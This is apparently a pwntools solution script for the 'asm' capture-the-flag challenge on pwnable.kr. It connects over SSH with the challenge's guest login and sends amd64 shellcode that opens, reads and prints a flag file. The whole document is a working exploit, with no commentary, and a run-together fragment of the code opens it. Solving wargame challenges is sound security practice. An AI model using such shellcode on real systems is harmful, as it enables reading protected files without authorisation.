from pwn import *context(arch='amd64', os='linux')elf = ELF('./asm')flag_nam

1. from pwn import *
2.  
3. context(arch='amd64', os='linux')
4. elf = ELF('./asm')
5. flag_name = 'this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong'
6.  
7. #''' for ssh connect
8. sh = ssh(host = 'pwnable.kr', port = 2222, user = 'asm', password = 'guest' )
9. #sh.download_file('asm')
10. #s = sh.process('./asm')
11. s = sh.connect_remote('localhost', 9026)
12. #'''
13.  
14. #s = process('./asm')
15.  
16. raw_input('press_any_key')
17.  
18. payload = ''
19. payload += shellcraft.amd64.pushstr(flag_name)
20. payload += shellcraft.amd64.open('rsp')
21. payload += shellcraft.amd64.read('rax', 'rsp', 1024)
22. payload += shellcraft.amd64.write(1, 'rsp', 1024)
23. log.info(payload)
24. payload = asm(payload)
25.  
26. log.info(s.recvuntil("shellcode: "))
27. s.send(payload)
28. log.success(s.recv(1024))